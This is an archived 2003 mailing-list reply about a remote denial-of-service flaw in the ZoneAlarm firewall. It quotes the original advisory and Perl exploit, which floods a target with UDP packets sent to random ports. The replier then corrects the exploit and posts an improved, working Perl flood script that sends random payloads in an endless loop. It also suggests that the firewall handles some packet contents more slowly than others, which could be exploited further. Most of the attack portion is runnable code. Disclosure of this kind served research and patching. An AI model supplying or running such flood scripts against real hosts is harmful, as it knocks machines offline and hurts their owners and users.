lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 3 Sep 2003 17:46:36 +0400
From: Igor <sprog@...ine.ru>
To: _6mO_HaCk <hackologyteam@...oo.com>
Subject: Re: ZoneAlarm remote Denial Of Service exploit


Hello _6mO_HaCk,

First of all thank you for this useful discovery.

> for (;;) {
>  $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
> $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
> $rand x $rand;
>  $port=int(rand 65000) +1;
>  send(DoS, 0, $size, sockaddr_in($port, $iaddr));
> }

You're always sending 0 on random ports. Actually it doesn't matter
what you send but valid packets are taking vsmon more time to
handle.

The string:

 send(DoS, 0, $size, sockaddr_in($port, $iaddr));

is not what you have meant and only works in your case since $size is
always zero. Luck. Anyway the whole 'random' traffic is zero out
there... and why use 'my' if you don't use 'strict'?

send SOCKET,MSG,FLAGS,TO
send SOCKET,MSG,FLAGS

I think what you wanted to write was this:

---ZAD---

#!/usr/bin/perl
use Socket;

print <<Msg;
--- ZoneAlarm Remote DoS Xploit
---
--- Discovered & Coded By _6mO_HaCk
Msg
;

$target = $ARGV[0];
print("\n\n[*] Usage : perl $0 <Target>\n\n"),exit  if(!$target);

inet_aton($target) || die ("[-] Unable to resolve $target");
socket(DoS, PF_INET, SOCK_DGRAM, (getprotobyname('udp'))[2]);
$iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
  $msg=(chr(int(rand(255))) x int(rand(10)) x int(rand(20)) x int(rand(30)));
  $port=int(rand 65000) +1;
  send(DoS,$msg,0, sockaddr_in($port, $iaddr));
}
---End ZAD---


Honestly I didn't expect this from ZoneLabs, it is so lame so awful
for firewall and it shows us all that ZoneLabs didn't test their
software. What firewall should be tested first on? On the speed of
random packets handling. There are two standard cases - UDP and TCP/IP.
You'd better ask some money out of ZoneLabs - you've done
their job.

It appears that Zone Alarm is responding differently on UDP packets content.
Some packets take vsmon more time to handle (So there is playground
for you when the update is released).

Well anyway if you reverse and take a look inside of zonealarm.exe you will
find out how good it is stuffed, after that both 60% slowdown and
nice loading time (it was improved though) won't amaze you any longer.

What you expect of a small and colorful ZoneAlarm when windows RPC
is programmed this way?



_> # Overview : 
_> #
_> # ZoneAlarm is a firewall software
_> # package designed for Microsoft Windows 
_> # operating systems that blocks intrusion 
_> # attempts, trusted by millions, and has 
_> # advanced privacy features like worms, 
_> # Trojan horses, and spyware protection. 
_> # ZoneAlarm is distributed and maintained 
_> # by Zone Labs.http://www.zonelabs.com
_> #
_> # Details :
_> #
_> # ZoneAlarm was found vulnerable to a
_> # serious vulnerability leading to a
_> # remote Denial Of Service condition due 
_> # to failure to handle udp random 
_> # packets, if an attacker sends multiple 
_> # udp packets to multiple ports 0-65000, 
_> # the machine will hang up until the
_> # attacker stop flooding. 
_> #
_> # The following is a remote test done 
_> # under ZoneAlarm version 3.7.202 running 
_> # on windows xp home edition.
_> #
_> # on irc test1 joined running ZoneAlarm
_> # version 3.7.202 with default
_> # installation
_> #
_> # * test1 (test@...251.***.**) has joined #Hackology
_> #
_> # from a linux box :
_> #
_> # [root@...l DoS]# ping 62.251.***.**
_> # PING 62.251.***.** (62.251.***.**) from 
_> # ***.***.**.** : 56(84) bytes of data.
_> #
_> # --- 62.251.***.** ping statistics ---
_> # 7 packets transmitted, 0 received, 100% 
_> # loss, time 6017ms
_> #
_> # on irc
_> #
# ->> [test1] PING
_> #
_> # [test1 PING reply]: 1secs
_> #
_> # Host is firewalled and up
_> #
_> # now lets try to dos
_> #
_> # --- ZoneAlarm Remote DoS Xploit
_> # ---
_> # --- Discovered & Coded By _6mO_HaCk
_> #
_> # [*] DoSing 62.251.***.** ... wait 1
_> # minute and then CTRL+C to stop
_> #
_> # [root@...l DoS]#
_> #
_> # after 2 minutes
_> #
_> # * test1 (test@...251.***.**) Quit (Ping timeout)
_> #
_> # I have made the same test on ZoneAlarm 
_> # Pro 4.0 Release running on windows xp
_> # professional and i've got the same 
_> # result.
_> #
_> # Exploit released : 02/09/03
_> #
_> # Vulnerable Versions : ALL
_> #
_> # Operating Systems : ALL Windows
_> #
_> # Successfully Tested on :
_> #
_> # ZoneAlarm version 3.7.202 / windows xp 
_> # home edition / windows 98.
_> #
_> # ZoneAlarm Pro 4.0 Release / windows xp 
_> # professional
_> #
_> # Vendor status : UNKOWN
_> #
_> # Solution : Shut down ZoneAlarm and wait 
_> # for an update.
_> #
_> # The following is a simple code written 
_> # in perl to demonstrate that, the code 
_> # is clean, it wont eat your cpu usage
_> # and it doesnt need to be run as root 
_> # but you still have to use it at your
_> # own risk and on your own machine or
_> # remotly after you get permission.
_> #
_> # Big thanx go to D|NOOO and frost for 
_> # providing me windows boxes with
_> # zonealarm for testing
_> #
_> # Greetz to ir7ioli, BlooDMASK
_> # Abderrahman@...e-h.org
_> # NRGY, Le_Ro| JT ghosted_ Securma,
_> # anasoft SySiPh, phrack, DeV|L0Ty, 
_> # MajNouN |BiG-LuV| h4ckg1rl and all 
_> # my ppl here in Chicago and in Morocco
_> #
_> # Comments suggestions or additional info 
_> # feel free to contact me at
_> # simo@...youssef.org
_> # _6mO_HaCk@...uxmail.org

_> #!/usr/bin/perl
_> use Socket;

_> system(clear);
_> print "\n";
_> print "--- ZoneAlarm Remote DoS Xploit\n";
_> print "---\n";
_> print "--- Discovered & Coded By _6mO_HaCk\n";
_> print "\n";
_> if(!defined($ARGV[0]))
_> {
_>    &usage
_> }

_> my ($target);
_>  $target=$ARGV[0];

_> my $ia       = inet_aton($target)          || die ("[-] Unable to resolve 
_> $target");

_> socket(DoS, PF_INET, SOCK_DGRAM, 17);
_>     $iaddr = inet_aton("$target");

_> print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

_> for (;;) {
_>  $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
_> $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
_> $rand x $rand;
_>  $port=int(rand 65000) +1;
_>  send(DoS, 0, $size, sockaddr_in($port, $iaddr));
_> }
_> sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}




-- 
Golden Telecom Software Department
Best regards,
 Igor                            mailto:sprog@...ine.ru

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ